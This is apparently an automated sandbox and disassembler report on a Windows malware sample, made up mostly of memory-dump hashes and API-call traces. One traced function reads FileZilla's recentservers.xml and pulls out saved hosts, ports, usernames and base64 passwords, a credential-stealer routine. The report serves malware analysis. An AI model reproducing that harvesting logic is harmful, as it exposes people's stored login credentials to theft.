                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                            • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                            • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                            • Instruction ID: 775a468b28aeb69567145bb0be1ec2203d1d4745b3c93fe27659d05ddd7522ad
                                            • Opcode Fuzzy Hash: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                            • Instruction Fuzzy Hash: 2182D1B5A00F448FD765CF29C880B93B7E1BF8A300F548A2ED9EA8B751DB30A545CB50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                            • Instruction ID: 2bcf4f3374857742c4395d19d254c600bfcd9af03afa7e154a2233e9242b32cc
                                            • Opcode Fuzzy Hash: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                            • Instruction Fuzzy Hash: DA320571E006158FDB14CF68C8887BEB7B2FF85314F18922AD459AB391D7749982CB92
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                            • Instruction ID: d0a855cef85b944b71df4da412df52415c466c8997b3807d487dc736c6660c8a
                                            • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                            • Instruction Fuzzy Hash: 7C42AF716046418FC726CF19C494726FBE2BF8D314F288A6FE4868B792D775E886CB50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                            • Instruction ID: 63c2cc827ed21a9e7cc4483247f0d16095995145b7165d6e015aa36097359b33
                                            • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                            • Instruction Fuzzy Hash: B002E671E006268FCB11CF79C8846BFB7A2AF99354F15831BE855B7340D771AD828B91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                            • Instruction ID: 5104c9bb7190df28e80aa1a6e1282a0b59ae46f0fd2e99e0c239151e01e11465
                                            • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                            • Instruction Fuzzy Hash: 7EF179A210D6914BC71E8A1584F08BD7FD39BAD104F4E8AADECD70F383D920DA01DB61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                            • Instruction ID: 8dd0d5e8b57687106d4cca24aa46f0cc039c5fe7ac522da269ccf9b59d3b1b9e
                                            • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                            • Instruction Fuzzy Hash: 68D184B3F11A294BEB08CE99CC913ADB6E2EBD8350F59413ED916E7381D6B85D0187D0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                            • Instruction ID: 628d76cd7a70cf03f3691141939516db7477cdaa6e61b9867fd3057c423c7fb0
                                            • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                            • Instruction Fuzzy Hash: B9026974E006598FCB16CFA8C4905EDBBB6FF89310F54815AE8996B355CB30AA91CB90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                            • Instruction ID: 771c84d8d64fbccdb39bd127beb6e2f9c3e9b17363b4c2bfb482067f6355d503
                                            • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                            • Instruction Fuzzy Hash: 92022575E006198FCF15CF98C4809ADB7B6FF88310F55816EE809AB354DB31AA92CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                            • Instruction ID: 97195a29d59007211356cd46f35a43ec17d88be75a029d53a0357af02b290c85
                                            • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                            • Instruction Fuzzy Hash: 33C14B76E29B924BD313873DD842265F795AFE7194F05D72FFCE472A82EB3092818244
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                            • Instruction ID: 1be6631e0d0c8c5cb52f6ea81ec355be046f4513786bfb1ebec28153e1886876
                                            • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                            • Instruction Fuzzy Hash: 71D13470600B64CFD721CF29C484BA7B7E1BB49704F548A2ED89A8BB92DB35E445CF91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                            • Instruction ID: 342ca1d9c4ed76d866d944217257b32f645bede4c0f341ce7066aa91ec1e651e
                                            • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                            • Instruction Fuzzy Hash: B5B18172E083115BD308CF25C89076BF7E2EFC8310F5AC93EA89D97291D778D9459A82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                            • Instruction ID: 43ca4eabe1eca2f671f0ccc0fe7490f2c1dab48f52151977bb3c270841548985
                                            • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                            • Instruction Fuzzy Hash: 60B16E72A083119BD308CF25C89176BF7E2EFCC310F5AC93EE89997291D774D9459A82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                            • Instruction ID: 2308532369629b982a5c645756e7f6550c394ebca86e698ae909857386d6f1e7
                                            • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                            • Instruction Fuzzy Hash: 07B12771A097118FD706EE3EC481219F7E1AFD6280F50C72EE899B7662EB31E885C740
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                            • Instruction ID: e34d3e7c313080ed0187dc32a874f7c40c9717ca0fc80bd3634c9dcdbf0059af
                                            • Opcode Fuzzy Hash: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                            • Instruction Fuzzy Hash: AA91C075F002158BDF14CE68C988BBBB3A2AF55714F1940ABD95DAB382D371D841CBA3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                            • Instruction ID: 991988afffc8a56c7c6940eb62c8d5f50e7b7ea5cc49e0eae337eebcef83485b
                                            • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                            • Instruction Fuzzy Hash: 49B14F31611608DFD715CF28C48ABA57BE0FF45368F29865AE9A9CF3A1C335D982DB40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                            • Instruction ID: 5c580ca6971a127833ccd2df00b1a2e08535cd7e44daa83f96bb3b5c4d7ef92e
                                            • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                            • Instruction Fuzzy Hash: C6C14A75A0471A8FC715DF28C08055AB3F2FF88350F258A6DE8999B721D731E996CF81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                            • Instruction ID: c5d26c82807f189b84cb43eb29169b2d48273009850a207470180cdf4e858454
                                            • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                            • Instruction Fuzzy Hash: C29159319287A16AEB168B38CC817AABB55FFD6350F00C71BF9D8725A2FB7185858344
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                            • Instruction ID: 2f5f3f7f5589a262ee5bcb69bbe9cd0c05db9711660ffd4d0e539ca449be3457
                                            • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                            • Instruction Fuzzy Hash: 2DA109B2A10A19CBEB19CF55CCC9AAABBB1FB48314F14C22BD45AE73A0D3349544CF51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                            • Instruction ID: 8c802ccd69519786fb3fc7c91772ac530f6cea571964190d5dfc5b44e59a98ed
                                            • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                            • Instruction Fuzzy Hash: 35A17072A087119BD308CF25C89075BF7E2EFC8710F1ACA3EE89997254D774E8419B82
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                            • Instruction ID: e6bd2b2e052bebfcc9fa78dd015b05f53a0df3284bc514c9d8bc4d1120185087
                                            • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                            • Instruction Fuzzy Hash: BC514C72E09BD589C7058B7944502EEBFB21FE6114F1E82DEC4981F382C375568AC3E6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_860000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction ID: 9854b884e7cd5006902a75673e5c6f178e2d6a456b9c37d4852ceca44a080000
                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction Fuzzy Hash: 97117C72340100AFD754DE59DCC1FA773EAFB99320B2A8065ED08CB316D676E841CB65
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction ID: c910d28e80a456aee6d0d9f21cd52f6b4ecb506da608a48c7aca2698276de3ce
                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction Fuzzy Hash: 33012B736116008FDF65CF28E904BAA33F5FB85206F0540B5EA06D7347E370A841CB80
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                            • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                            • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                            • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                            • Instruction ID: 14e23b2c787113d4c1885ee09e740ccbe276c27880ba8a4b23f86074dc1b6511
                                            • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                            • Instruction Fuzzy Hash: B571BD31411A009AD7723B32DD51E4B77A3FF07748F10CA3FA2B621DF09A7268A59E59
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • strtok_s.MSVCRT ref: 0041047B
                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
                                            • lstrlenA.KERNEL32(00000000), ref: 004104F3
                                              • Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
                                              • Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93
                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
                                            • lstrlenA.KERNEL32(00000000), ref: 0041053D
                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
                                            • lstrlenA.KERNEL32(00000000), ref: 00410587
                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
                                            • lstrlenA.KERNEL32(00000000), ref: 004105D5
                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
                                            • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
                                            • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
                                            • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
                                            • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
                                            • lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
                                            • lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
                                            • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
                                            • lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
                                            • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
                                            • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
                                            • lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
                                            • lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
                                            • strtok_s.MSVCRT ref: 004107D9
                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
                                            • memset.MSVCRT ref: 0041083D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                            • API String ID: 337689325-555421843
                                            • Opcode ID: 651455bee2b0a42756e9565741800342137787040433ad72e4a79f1cb305d28c
                                            • Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
                                            • Opcode Fuzzy Hash: 651455bee2b0a42756e9565741800342137787040433ad72e4a79f1cb305d28c
                                            • Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69
                                            APIs
                                            • lstrlen.KERNEL32(00424EC8), ref: 023F4883
                                            • lstrlen.KERNEL32(00424F78), ref: 023F488E
                                            • lstrlen.KERNEL32(00425040), ref: 023F4899
                                            • lstrlen.KERNEL32(004250F8), ref: 023F48A4
                                            • lstrlen.KERNEL32(004251A0), ref: 023F48AF
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 023F48BE
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F48C5
                                            • lstrlen.KERNEL32(00425248), ref: 023F48D3
                                            • lstrlen.KERNEL32(004252F0), ref: 023F48DE
                                            • lstrlen.KERNEL32(00425398), ref: 023F48E9
